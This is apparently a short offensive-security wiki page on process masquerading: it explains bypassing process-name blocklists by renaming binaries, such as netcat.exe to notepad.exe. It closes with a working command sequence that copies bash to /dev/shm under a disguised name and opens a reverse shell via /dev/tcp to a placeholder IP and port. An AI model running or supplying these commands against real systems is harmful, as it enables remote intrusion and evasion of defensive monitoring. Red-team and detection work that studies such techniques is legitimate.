Process Name Blacklisting

Process Masquerading

Sometimes certain processes are being identified by process name and killed.

Blocklists on filenames as a defensive measure can be bypassed by making a copy of a binary and give it a different name.

For example, renaming netcat.exe to notepad.exe or a legitimate business process name will bypass the simple name check.

Start a reverse shell

cp /bin/bash /dev/shm/tokyo

chmod +x /dev/shm/tokyo

/dev/shm/tokyo -c '/dev/shm/tokyo -i >& /dev/tcp/IP/PORT 0>&1'

Last updated 22 days ago